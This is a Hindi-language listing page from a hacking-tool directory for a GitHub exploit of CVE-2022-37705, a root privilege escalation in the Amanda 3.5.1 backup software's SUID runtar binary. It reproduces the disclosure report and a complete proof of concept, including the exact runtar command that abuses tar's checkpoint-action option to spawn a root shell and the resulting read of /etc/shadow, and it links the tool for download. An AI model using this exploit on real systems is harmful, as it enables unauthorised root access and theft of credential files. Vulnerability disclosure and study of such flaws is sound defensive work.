Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-37705 — Amanda 3.5.1 दूसरा LPE। | Kitploit
उपकरण/GitHubGitHub/maherazzouzi/cve-2022-37705
विशेषाधिकार वृद्धिस्थैतिक विश्लेषणभेद्यता विश्लेषणकोड विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubmaherazzouzi/cve-2022-37705

CVE-2022-37705

Amanda 3.5.1 दूसरा LPE।

रिपॉजिटरी देखें
3133 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

[सुझाया गया विवरण] Amanda 3.5.1 में एक विशेषाधिकार वृद्धि दोष पाया गया जो backup उपयोक्ता को root विशेषाधिकारों तक ले जा सकता है। कमजोर घटक runtar SUID है, जो /usr/bin/tar को विशेष तर्कों के साथ चलाने के लिए केवल एक रैपर है जिन्हें हमलावर नियंत्रित कर सकता है। प्रोग्राम tar बाइनरी को दिए गए args की सही ढंग से जाँच नहीं करता (यह मानता है कि सभी args इस प्रकार होने चाहिए --ARG VALUE लेकिन हम इसे --ARG=VALUE प्रदान कर सकते हैं एक तर्क के रूप में)।


[अतिरिक्त जानकारी] इस दोष का उपयोग कोड निष्पादन (Code Execution), सेवा अस्वीकार (Denial of Service), विशेषाधिकार वृद्धि (Escalation of Privileges) और सूचना प्रकटीकरण (Information Disclosure) के लिए किया जा सकता है। यह इसे एक्सप्लॉइट करने और रूट शेल प्राप्त करने के लिए PoC है: backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)

backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied

backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names

head /etc/shadow

root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::


[भेद्यता प्रकार अन्य] दोषपूर्ण तर्क जाँच।


[उत्पाद का विक्रेता] Amanda


[प्रभावित उत्पाद कोड बेस] runtar - 3.5.1


[प्रभावित घटक] प्रभावित SUID बाइनरी है: runtar प्रभावित फ़ाइल है: runtar.c प्रभावित कोड की पंक्तियाँ पंक्ति 162 से शुरू होती हैं।


[हमले का प्रकार] स्थानीय


[प्रभाव कोड निष्पादन] true


[प्रभाव सेवा अस्वीकार] true


[प्रभाव विशेषाधिकार वृद्धि] true


[प्रभाव सूचना प्रकटीकरण] true


[हमले के वेक्टर] बाइनरी का शोषण करने के लिए आपको केवल runtar SUID बाइनरी को विशेष रूप से तैयार किए गए तर्क देने होंगे ताकि root तक विशेषाधिकार बढ़ाया जा सके।


[संदर्भ] http://www.amanda.org/


[खोजकर्ता] Maher Azzouzi

CVE-2022-37705 का उपयोग करें।

टूल डाउनलोड करें